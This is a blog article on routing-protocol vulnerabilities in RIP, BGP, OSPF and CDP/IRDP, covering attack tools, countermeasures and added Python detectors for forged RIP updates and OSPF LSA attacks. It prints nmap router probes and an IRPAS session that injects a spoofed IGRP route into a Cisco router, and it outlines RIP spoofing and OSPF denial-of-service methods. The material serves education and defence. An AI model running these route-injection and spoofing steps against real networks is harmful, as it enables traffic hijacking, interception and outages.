
Thursday, 10 November 2011

Vulnerabilities in some routing protocols

This article discusses attacks on the low-level protocols of a network and ways to prevent them, in particular vulnerabilities in routing and in routing protocols such as the Routing Information Protocol (RIP), the Border Gateway Protocol (BGP) and Open Shortest Path First (OSPF).

Routers play a key role in every network. If a router is compromised, or a route is successfully spoofed, the integrity of the network is severely damaged; it is worse still when the hosts using those routes do not encrypt their traffic, because once the path is under an attacker's control the network is exposed to man-in-the-middle attacks, denial of service, data loss, loss of network integrity and sniffing.

Routing is a huge and complex topic, so I only cover part of it here, and given my limited level I welcome corrections.

===============================================================================

Some very common router security problems

Many routers have a range of well-known security problems. For the common problems in low-level network equipment from vendors such as Cisco, Livingston and Bay, see the following address, which collects quite a few vulnerabilities:

http://www.antionline.com/cgi-bin/anticode/anticode.pl?dir=router-exploits

Most of the vulnerabilities collected there have nothing to do with attacks at the routing-protocol level; they stem from misconfiguration, incorrect handling of IP packets, SNMP left with its default community strings, weak passwords, or encryption that is not strong enough. A standard NIDS can generally detect attacks of this kind. They weaken the network foundation to some degree and can be combined with attacks on higher-level protocols.

Correct configuration management takes care of many of the common vulnerabilities. The standard practices are: do not use SNMP (or at least choose strong community strings), keep patches current, use access control lists correctly, apply ingress and egress filtering, firewall the devices, encrypt management channels and protect passwords, filter routes and use MD5 authentication. Of course, before adopting these practices you must understand what each rule means and which services it affects.

================================================================================

Recent development of infrastructure defence and detection systems

A notable recent network-defence development project is an IDS called JiNao; you can find more at http://www.anr.mcnc.org/projects/JiNao/JiNao.html. JiNao was started under DARPA and is now a collaborative research project developed jointly by MCNC and North Carolina State University. JiNao runs in on-line mode on FreeBSD and Linux (using divert sockets) and in off-line mode on Solaris, and it has been tested on three networks: MCNC, NCSU and the AF/Rome Laboratory, a mix of PC-based routers (the operating system doing the routing) and commercial routers. The test results show that it can successfully prevent many types of attack on the network infrastructure and detect them with high precision.

At present JiNao appears to concentrate on the Open Shortest Path First (OSPF) protocol, and eventually it is meant to extend to a range of protocols. The JiNao team points out that attack prevention and intrusion detection will be integrated into network management, so JiNao is moving towards combining a network firewall, an intrusion detection system and a network management system into one.

Another tool that analyses high-level protocols well is the Agilent Advisor network analyser (http://onenetworks.comms.agilent.com/); it supports many routing protocols and lets you build custom filters to detect various kinds of abnormal behaviour.

================================================================================

Some tools that work with routing protocols

-------------------------------
The Linux divert sockets page describes them as follows: "Divert sockets enable IP packet capture and injection both on end hosts and on routers. Capture and injection take place at the IP layer; captured packets are diverted to a socket in user space and therefore do not reach their final destination unless the user-space socket re-injects them. Between capture and re-injection this allows all kinds of processing (such as routing and firewalling) to happen outside the kernel." (http://www.anr.mcnc.org/~divert/). Put simply, a divert socket lets a user-space program handle the IP packets passing through the kernel. Divert sockets first appeared in FreeBSD, where NAT, for example, is built on them. This makes development easy, because the code lives in user space, while packet handling remains reasonably efficient, because the packets are taken straight from the kernel's IP path.

Divert sockets can be found at http://www.anr.mcnc.org/~divert/. As said above, they were first implemented in FreeBSD and have now been ported to Linux, where they are used as part of the JiNao IDS project.

------------------------------

Another tool, the Nemesis Packet Injection suite, is a fairly powerful networking and security tool written by Obecian; you can get it from http://www.packetninja.net. The latest release, nemesis-1.1, came out on 24 June 2000. Nemesis is a "command-line UNIX network packet injection suite" and a good tool for testing firewalls, intrusion detection systems, routers and other network environments. It can be used by attackers and by authorised penetration testers to test security at the host and network level. The same site hosts an evolution of Nemesis called Intravenous, released on 11/30/00. Intravenous appears to carry all of Nemesis' basic functionality; the difference is the addition of an artificial-intelligence engine. More information about Intravenous can be found on the packetninja.net site.

----------------------------

IRPAS, the Internetwork Routing Protocol Attack Suite, written by FX, can be found at
http://www.phenoelit.de/irpas/. IRPAS contains a set of command-line tools that work at the protocol layer against Cisco routing equipment,
including the following commands:
cdp: sends Cisco Discovery Protocol (CDP) messages;

igrp: injects Interior Gateway Routing Protocol (IGRP) messages; irdp: sends ICMP Router Discovery Protocol (IRDP) messages;

irdpresponder: answers IRDP requests with crafted packets;

ass: the Autonomous System Scanner (the version currently available for download supports only IGRP). A word on the term autonomous system, usually abbreviated AS: put simply, it is a group of internal routers that exchange information about the internal network using a common protocol; in other words, routers that manage themselves and exchange routing information among themselves, as opposed to the external routers we usually hear about, such as those at a carrier's nodes. A typical AS uses a single routing protocol to generate and propagate routing information within its boundary. ass is like a TCP port scanner, except that it scans autonomous systems: if an AS answers, it returns all the routes known to the routing process. The IRPAS site also contains a document on a Generic Routing Encapsulation (GRE) vulnerability that allows an external attacker to bypass NAT and compromise an internal RFC1918 network reached over a VPN: http://www.phenoelit.de/irpas/gre.html. Other sections of the site contain more information and possible attack strategies using irpas.

FX, the author of irpas, sent a sample AS scan made with the (not yet released) ass 2.14, together with an igrp run that uses the information from the ass scan (AS #10 and the other data) to inject a spoofed route to 222.222.222.0/24. Although IGRP is not much used any more, the example is a good one. FX's test results follow:

test# ./ass -mA -i eth0 -D 192.168.1.10 -b15 -v
(here -i is the interface, -D the destination address, and -b15 scans autonomous systems 0 to 15)
ASS [Autonomous System Scanner] $Revision: 2.14 $
(c) 2k FX <fx@phenoelit.de>
Phenoelit (http://www.phenoelit.de)
No protocols selected; scanning all
Running scan with:
interface eth0
Autonomous systems 0 to 15
delay is 1
in ACTIVE mode

Building target list ...
192.168.1.10 is alive
Scanning ...
Scanning IGRP on 192.168.1.10
Scanning IRDP on 192.168.1.10
Scanning RIPv1 on 192.168.1.10
shutdown ...

OK, which gives the following results:
>>>>>>>>>>>> Results >>>>>>>>>>>
192.168.1.10
IGRP
#AS 00010 10.0.0.0 (50000,1111111,1476,255,1,0)
IRDP
192.168.1.10 (1800,0)
192.168.9.99 (1800,0)
RIPv1
10.0.0.0 (1)


test# ./igrp -i eth0 -f routes.txt -a 10 -S 192.168.1.254 -D 192.168.1.10
Here routes.txt is a file you have to write yourself:
routes.txt:
# Format
# destination:delay:bandwith:mtu:reliability:load:hopcount
222.222.222.0:500:1:1500:255:1:0

Cisco#sh ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
U - per-user static route

Gateway of last resort is not set

10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
C 10.1.2.0/30 is directly connected, Tunnel0
S 10.0.0.0/8 is directly connected, Tunnel0
C 192.168.9.0/24 is directly connected, Ethernet0
C 192.168.1.0/24 is directly connected, Ethernet0
I 222.222.222.0/24 [100/1600] via 192.168.1.254, 00:00:05, Ethernet0
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
See: 222.222.222.0/24 is now reached via 192.168.1.254, the address the attacker chose.

-----------------------------

rprobe & srip: these tools come with a very good guide to RIP spoofing written by humble, which you can find at http://www.technotronic.com/horizon/ripar.txt. rprobe requests a copy of the RIP routing table from a routing daemon; tcpdump or any other sniffer can be used to capture the reply. srip can then send a forged RIPv1 or RIPv2 message from an arbitrary source IP; it can insert new routes and invalidate existing ones, although the attacker or penetration tester needs to know which command-line parameters to use. For an introduction to these tools with examples, see the Network Devices chapter of Hacking Exposed, second edition.

------------------------

There are of course other tools that work with routing protocols and can be used by attackers or penetration testers, such as routed, gated, zebra, mrt and gasp; see other documents for those.

=================================================================================

Below is a brief explanation of each protocol, its related vulnerabilities and the defensive measures that can be taken.

Routing Information Protocol (RIP)

The Routing Information Protocol (RIP) is a distance-vector routing protocol in which every route is measured in hops. An Autonomous System (AS) is the administrative unit that manages the whole system of hosts, routers and other network devices. RIP is an interior gateway protocol: it performs routing inside an autonomous system, as opposed to the well-known exterior gateway protocols, such as the Border Gateway Protocol (BGP), which route between different autonomous systems. RIP is not a good choice for large networks because it supports only 15 hops; RIPv1 is also classful and carries no subnet masks, whereas RIPv2 carries a subnet mask, route tag and next hop for every route. RIP can coexist with other routing protocols; according to Cisco it is often used alongside OSPF, although many documents say OSPF should replace RIP. Be aware that routes learnt through RIP updates can be redistributed into other routing protocols, so if an attacker can spoof a route into the network via RIP and it is then redistributed through another protocol such as OSPF, or through BGP without authentication, the reach of the attack may expand considerably.

RIP vulnerabilities and countermeasures

A tester or attacker can probe UDP port 520 to find out whether RIP is in use, with a familiar tool such as nmap. In the scan below the port is open and no access control or filtering of any kind is applied:

[root@test]# nmap -sU -p 520 -v router.ip.address.2
interesting ports on (router.ip.address.2):
Port State Service
520/udp open route

Scans of UDP port 520 rank 7th in the "Top 10 Target Ports" at http://www.dshield.org/, which shows that a lot of people are scanning for RIP; that is no doubt related to the growing number of routing attack tools.

RIPv1 is inherently insecure: it has no authentication mechanism and runs over unreliable UDP. The RIPv2 packet format includes an optional authentication entry that carries either a 16-byte plaintext password (which can easily be sniffed) or a keyed MD5 digest. RIP packets are easy to forge, but using MD5 authentication with RIPv2 makes spoofing considerably harder. One tool that can do this is the RIP command of the nemesis project, nemesis-rip, but because it has many command-line options and demands prior knowledge, nemesis-rip is hard for script kiddies to use; carrying out an effective RIP spoof with nemesis-rip or a similar tool requires a fair amount of knowledge. However, chapter 10 (Network Devices) of "Hacking Exposed", second edition, describes a combination of tools that makes RIP spoofing fairly easy: rprobe to obtain the remote network's RIP routing table, standard tcpdump or another sniffer to read it, srip to forge RIP packets (v1 or v2), fragrouter to redirect the route through a host we control, and a tool like dsniff to collect cleartext passwords from the redirected traffic.

Even though spoofing is known to be easy, some large network providers still rely on RIP for parts of their routing, and whether they apply any security measures is unknown. RIP is clearly still in use; one hopes that few people run RIPv1 and that the rest use RIPv2 with MD5 authentication, or have migrated to OSPF with MD5 authentication, to improve security.
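The following is an added example, not code from the article or from any of the tools it mentions. It builds RIPv2 RESPONSE packets with no authentication, with the plaintext password option and with keyed MD5 (the formats of RFC 2453 and RFC 2082), then parses them the way a sniffer or a NIDS would: the plaintext password falls straight out of the capture, a keyed-MD5 update verifies only with the right key and fails once a single metric byte is changed, and an srip-style poison (metric 16) is flagged. The addresses, keys and routes are constructed for the example, nothing is sent on the wire, and the "RIP-2 Packet Length" field is treated as the offset of the trailer from the start of the RIP header, which is my reading of RFC 2082.

```python
import hashlib
import hmac
import struct
from ipaddress import IPv4Address

RIP_PORT = 520                      # UDP, the port the nmap scan above probes
CMD_RESPONSE = 2
AUTH_AFI = 0xFFFF                   # address family value that marks an authentication entry
AUTH_PLAINTEXT, AUTH_KEYED_MD5 = 2, 3
INFINITY = 16                       # metric meaning "unreachable": a route poison


def rte(prefix, mask, nexthop, metric, tag=0):
    """One 20-byte RIPv2 route entry (AFI 2 = IPv4)."""
    return struct.pack("!HH4s4s4sI", 2, tag, IPv4Address(prefix).packed,
                       IPv4Address(mask).packed, IPv4Address(nexthop).packed, metric)


def build_response(routes, auth=None, key=b"", key_id=1, seq=1):
    """RIPv2 RESPONSE with no auth, simple-password auth (type 2) or keyed MD5 (type 3)."""
    header = struct.pack("!BBH", CMD_RESPONSE, 2, 0)
    body = b"".join(rte(*r) for r in routes)
    if auth is None:
        return header + body
    if auth == AUTH_PLAINTEXT:
        # the password rides in the clear inside the first entry (struct pads it to 16 bytes)
        return header + struct.pack("!HH16s", AUTH_AFI, AUTH_PLAINTEXT, key) + body
    # keyed MD5: auth header entry, the routes, then a trailer that carries the digest
    trailer_off = 4 + 20 + len(body)
    auth_hdr = struct.pack("!HHHBBI8x", AUTH_AFI, AUTH_KEYED_MD5, trailer_off, key_id, 16, seq)
    unsigned = header + auth_hdr + body + struct.pack("!HH", AUTH_AFI, 0x0001)
    # digest = MD5 over the packet with the 16-byte key sitting where the digest will go
    digest = hashlib.md5(unsigned + key.ljust(16, b"\0")).digest()
    return unsigned + digest


def parse(pkt, key=b""):
    """Classify a captured RIP packet: version, auth type, leaked password, digest check, poisons."""
    cmd, ver, _ = struct.unpack("!BBH", pkt[:4])
    info = {"command": cmd, "version": ver, "auth": "none", "password": None,
            "md5_ok": None, "routes": [], "poisoned": []}
    off = 4
    while off + 20 <= len(pkt):
        afi, sub = struct.unpack("!HH", pkt[off:off + 4])
        if afi == AUTH_AFI and sub == AUTH_PLAINTEXT:
            info["auth"] = "plaintext"
            info["password"] = pkt[off + 4:off + 20].rstrip(b"\0")   # free for any sniffer
        elif afi == AUTH_AFI and sub == AUTH_KEYED_MD5:
            info["auth"] = "keyed-md5"
            trailer_off = struct.unpack("!H", pkt[off + 4:off + 6])[0]
            signed = pkt[:trailer_off + 4]           # up to and including the trailer's 0xFFFF/0x0001
            expected = hashlib.md5(signed + key.ljust(16, b"\0")).digest()
            info["md5_ok"] = hmac.compare_digest(pkt[trailer_off + 4:trailer_off + 20], expected)
        elif afi == AUTH_AFI:
            break                                    # the MD5 trailer: no route entries follow it
        elif afi == 2:
            _, tag, dst, mask, nh, metric = struct.unpack("!HH4s4s4sI", pkt[off:off + 20])
            route = (str(IPv4Address(dst)), str(IPv4Address(mask)), metric)
            info["routes"].append(route)
            if metric >= INFINITY:
                info["poisoned"].append(route)       # what srip does to kill an existing route
        off += 20
    return info


if __name__ == "__main__":
    routes = [("10.0.0.0", "255.0.0.0", "0.0.0.0", 1)]
    print("plaintext auth leaks:", parse(build_response(routes, AUTH_PLAINTEXT, b"s3cret"))["password"])
    good = build_response(routes, AUTH_KEYED_MD5, b"k1")
    print("genuine MD5 update verifies:", parse(good, b"k1")["md5_ok"])          # True
    forged = build_response(routes, AUTH_KEYED_MD5, b"guess")
    print("forged update verifies:", parse(forged, b"k1")["md5_ok"])            # False
    print("poison flagged:", parse(build_response([("10.0.0.0", "255.0.0.0", "0.0.0.0", INFINITY)]))["poisoned"])
```

Run as a script it prints the four checks; the same functions can be pointed at the payload of a UDP/520 datagram pulled from a tcpdump capture. Note that keyed MD5 only protects the update's integrity and origin: anyone who captures a valid update can still replay it until the sequence number moves on, and the key itself must be kept off every sniffable management channel.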

Border Gateway Protocol (BGP)

BGP is an Exterior Gateway Protocol (EGP): it routes between autonomous systems. BGP4 is the current standard. BGP uses several message types; the most important for this article is the UPDATE message, which carries routing-table updates. Most of the global Internet depends on BGP, so its security problems must be taken very seriously; a few years ago L0pht claimed that by exploiting routing-protocol weaknesses such as those of BGP they could bring down the whole Internet in a very short time.

BGP vulnerabilities and countermeasures

BGP communicates over TCP port 179, so nmap has to probe TCP port 179 to detect BGP.

[root@test]# nmap -sS -p 179 -v router.ip.address.2
Interesting ports on (router.ip.address.2):
Port State Service
179/tcp open bgp

An open BGP port: easier to attack.

[root@test]# nmap -sS -n -p 179 router.ip.address.6
Interesting ports on (router.ip.address.6):
Port State Service
179/tcp filtered bgp

The BGP port is filtered, which gives some resistance to attack.

Because BGP runs over TCP, it inherits the usual TCP problems: SYN flooding, sequence number prediction, general denial of service and so on. BGP has no sequence numbers of its own and relies on TCP's, so if a device uses a predictable initial sequence number scheme this type of attack is possible. Fortunately, most of the important routers on the Internet are Cisco devices, which are not believed to use a predictable sequence number scheme.

Some BGP implementations use no authentication at all by default, and some have the same problem as RIP, a plaintext password. If the authentication scheme is weak, an attacker's chances of remotely sending UPDATE messages that modify routing tables increase greatly, and the damage spreads further.

BGP can also propagate forged routing information if an attacker can modify or inject routes in a protocol such as RIP that is then redistributed into BGP; this flaw lies in the trust model, not in the protocol itself. BGP community configuration is also open to certain attacks, because in some situations the community value acts as a trust token and can be obtained. Attacking BGP through its underlying protocol (TCP) looks harder, because a session is normally point-to-point over a single physical link; but in some environments, for example two AS border routers connected through a switch, TCP injection is possible: an attacker on the same VLAN, or able to sniff the switch's traffic (say with dsniff via ARP spoofing), can watch the TCP sequence numbers, inject modified packets or hijack the connection with a tool like hunt. This kind of attack is generally easy to demonstrate only in a lab; in a real network it is too complex to succeed easily.

To make BGP more secure, control access to port 179 with an access list, use MD5 authentication, run BGP sessions over a secure transport medium, and filter routes (see http://www.cisco.com/univercd/cc/td/doc/product/software/ios120/12cgcr/np1_c/1cprt1/1cbgp.htm#40309), along with the standard secure routing filter configuration.

------------------------

Open Shortest Path First (OSPF)

OSPF is a dynamic link-state routing protocol. It maintains a dynamic map of the whole network and uses it to determine the shortest path between networks. OSPF is an interior link-state routing protocol; it works by sending link-state advertisements (LSAs) to neighbouring nodes, and when a router receives them it can compute the shortest path to every node with the SPF algorithm. Adjacent routers use the OSPF Hello protocol: every 10 seconds each sends a Hello packet to 224.0.0.5 and receives the packets the other routers send. An OSPF Hello header sniffed with iptraf looks like this:

OSPF hlo (a=3479025376 r=192.168.19.35) (64 bytes) from 192.168.253.67 to 224.0.0.5 on eth0

The router at 192.168.253.67 sends a Hello packet to the multicast address 224.0.0.5; in iptraf's output a is the area ID (a=3479025376) and r is the sender's OSPF router ID (192.168.19.35), so this is the router announcing itself to the other routers in that area.

Once a router has received Hello packets, it starts synchronising its link-state database with its neighbours.

An LSA header consists of the following fields: LS age, options, LS type, link state ID, advertising router ID,
LS sequence number, LS checksum and length.

OSPF vulnerabilities and countermeasures

OSPF uses IP protocol number 89, so you can use an nmap protocol scan to detect it, unless the network has been configured with access lists not to respond to such queries. For example:

[root@test]# nmap -sO router.ip.address.252
Interesting protocols on (router.ip.address.252):
Protocol State Name
89 open ospfigp

OSPF has several security mechanisms built in and is therefore much more secure than RIP, but several components of an LSA can still be modified by capturing and re-injecting OSPF packets; the JiNao team developed a Linux implementation of FreeBSD's divert sockets and used it in their tests.

OSPF can be configured with no authentication, with plaintext password authentication, or with MD5. If attackers gain a certain level of access they can use tools such as dsniff to monitor OSPF packets and any plaintext passwords, and then use divert sockets or one of the various ARP spoofing tools to redirect traffic.
The JiNao team found four denial-of-service attacks against OSPF; briefly:

--Max Age attack: the maximum age of an LSA is one hour (3600 seconds)

The attacker sends a copy of an LSA with its age set to MaxAge. The originating router responds by generating a refreshed instance of the LSA, and a contest over the suddenly changed age value begins. If the attacker keeps injecting MaxAge copies into the router population, the network becomes unstable and the result is denial of service.

--Sequence++ attack: the attacker keeps injecting LSAs with ever larger LS sequence numbers. According to the OSPF RFC, the LS sequence number field is used to decide which of two otherwise identical LSAs is older; the larger the sequence number, the more recent the LSA. So as long as the attacker keeps injecting LSAs with larger sequence numbers, the originating router keeps sending updated LSAs of its own with sequence numbers that exceed the attacker's, and this fight makes the network unstable and results in a denial of service.

--Maximum sequence number attack

Here the attacker injects an LSA with the largest sequence number, 0x7FFFFFFF. According to the OSPF RFC, when a router needs to go beyond the maximum sequence number, the LSA must first be flushed from the routing domain and then re-originated with InitialSequenceNumber. So if the attacker injects the maximum sequence number for one of a router's LSAs, which then has to be re-initialized, in theory a fight with the originating router should start immediately. In practice, however, JiNao found that in some cases the LSA carrying MaxSeq was not flushed but remained in the link-state database for an hour.

--Forged LSA attack

This attack relies on a bug in the gated daemon: all gated processes must be stopped and restarted to clear the forged, incorrect LSA, which causes a denial of service. The attack does not affect hardware routers, and it has no effect on newer versions of gated either.

For more on the above, see http://www.ietf.org/rfc/rfc2328.txt and JiNao's vulnerability analysis of OSPF, "On the Vulnerabilities and Protection of OSPF Routing Protocol" (http://www.anr.mcnc.org/projects/JiNao/ic3n98.ps).
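As an added illustration of what a monitor such as the JiNao IDS has to look for (this is not code from the original article or from JiNao), the following Python script parses OSPF LSA headers from constructed sample packets and flags the three indicators behind the Max Age, Sequence++ and maximum sequence number attacks described above: an LS age at MaxAge, a sequence number equal to MaxSequenceNumber, and an abnormally large sequence-number jump for the same LSA. The jump threshold is an assumed heuristic, not a value from RFC 2328.

```python
import ipaddress
import struct

# Architectural constants from RFC 2328
MAX_AGE = 3600               # MaxAge: an LSA at this age is being flushed
MAX_SEQ = 0x7FFFFFFF         # MaxSequenceNumber
INITIAL_SEQ = 0x80000001     # InitialSequenceNumber
SEQ_JUMP_THRESHOLD = 1000    # assumed heuristic for Sequence++ style jumps, not from the RFC

# LSA header (RFC 2328 A.4.1): age, options, type, LS ID, advertising
# router, LS sequence number (signed 32-bit), checksum, length
LSA_HDR = struct.Struct("!HBBIIiHH")


def to_signed(u32: int) -> int:  # 32-bit pattern -> signed LS sequence number
    return u32 - (1 << 32) if u32 & 0x80000000 else u32


def build_lsa_header(age, ls_type, ls_id, adv_router, seq_u32) -> bytes:
    """Constructed LSA header for the demo; checksum left at zero."""
    return LSA_HDR.pack(age, 0x02, ls_type, int(ipaddress.IPv4Address(ls_id)),
                        int(ipaddress.IPv4Address(adv_router)),
                        to_signed(seq_u32), 0, LSA_HDR.size)


def check_lsa(raw: bytes, db: dict) -> list:
    """Return anomaly tags for one LSA header; db tracks the newest seq per LSA."""
    age, _opt, ls_type, ls_id, adv, seq, _ck, _ln = LSA_HDR.unpack(raw[:LSA_HDR.size])
    key, tags = (ls_type, ls_id, adv), []
    if age >= MAX_AGE:
        tags.append("maxage")        # Max Age attack indicator
    if seq == MAX_SEQ:
        tags.append("maxseq")        # maximum sequence number attack indicator
    prev = db.get(key)
    if prev is not None and seq - prev > SEQ_JUMP_THRESHOLD:
        tags.append("seq-jump")      # Sequence++ attack indicator
    if prev is None or seq > prev:
        db[key] = seq
    return tags


def audit(headers) -> list:
    db = {}                          # (type, LS ID, adv router) -> newest seq seen
    return [check_lsa(h, db) for h in headers]


# Constructed sample: the router-LSA of 10.0.0.1 seen five times in arrival order
SAMPLE = [
    build_lsa_header(10, 1, "10.0.0.1", "10.0.0.1", INITIAL_SEQ),             # normal
    build_lsa_header(30, 1, "10.0.0.1", "10.0.0.1", INITIAL_SEQ + 1),         # normal refresh
    build_lsa_header(5, 1, "10.0.0.1", "10.0.0.1", INITIAL_SEQ + 5000),       # large jump
    build_lsa_header(MAX_AGE, 1, "10.0.0.1", "10.0.0.1", INITIAL_SEQ + 5000), # premature MaxAge
    build_lsa_header(5, 1, "10.0.0.1", "10.0.0.1", MAX_SEQ),                  # MaxSequenceNumber
]
```

Running `audit(SAMPLE)` tags the last three headers as seq-jump, maxage, and maxseq plus seq-jump respectively; the first two are clean.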

nemesis-ospf can produce the attacks described above against OSPF, but because nemesis-ospf has so many options and requires a detailed understanding of OSPF, ordinary attackers and administrators find these attacks hard to carry out. It is also said that nemesis-ospf does not always work correctly, which limits the tool's usefulness even further.
OSPF authentication requires a key exchange: every router must pass this key back and forth to authenticate itself whenever it tries to send OSPF messages. In the default configuration, router HELLO packets are exchanged every 10 seconds, which gives an attacker ample opportunity to eavesdrop on the key. If an attacker can sniff the network and obtain the key, OSPF packets can be forged, and worse, the forged OSPF packets can redirect traffic arbitrarily. Of course such attacks are very rare, not only because of their difficulty, but mainly because there are other, easier vulnerabilities to exploit; nobody goes after the hard target first.

It is therefore recommended that hosts not use dynamic routing; static routing does the job perfectly well for most hosts. Hosts running dynamic routing protocols are exposed to attack; for example, an authentication problem was found in the gated software a few years ago.

-------------------------

On using IRPAS to attack CDP and IRDP

The cdp program in IRPAS mainly sends CDP (Cisco Discovery Protocol) messages to Cisco routers and can cause a denial of service on the internal network segment: sending some garbage characters can make the router reboot or crash. It can also be used for spoofing, opening the door for other, more dangerous programs. One possible attack scenario: use cdp to knock the router out of service, then use the irdp or irdpresponder tool to advertise a new router with a high preference value. If the target router, down from the denial of service, can no longer communicate, the new router's high preference value will be accepted, and if the attacker's value is adopted the attacker has easily inserted their own system into the communication path.

This type of attack can also be used against hosts configured to use IRDP. Windows 98 uses IRDP by default, and Windows NT can be configured manually to support it; such hosts broadcast three ICMP Router Solicitation messages at boot. L0pht published an advisory describing in detail the vulnerabilities of Windows and Sun machines that use IRDP; you can find it at the following address:
http://www.l0pht.com/advisories/rdp.txt

=================================================================================

Computer networks such as the Internet depend heavily on routing protocols being handled correctly; some of the poorly performing links within China, for instance, are largely the result of badly handled routing. The security of routing protocols is therefore especially important. Although attacks against routing protocols are not common today, and I rarely see them written up (whether because nobody knows, nobody wants to know, or for some other reason; I hope this rough brick draws out some finer jade), the appearance of tools such as nemesis and irpas, together with research and development on protecting the lower network layers such as the JiNao IDS, will make attacks on routing protocols easier to carry out and easier to understand.
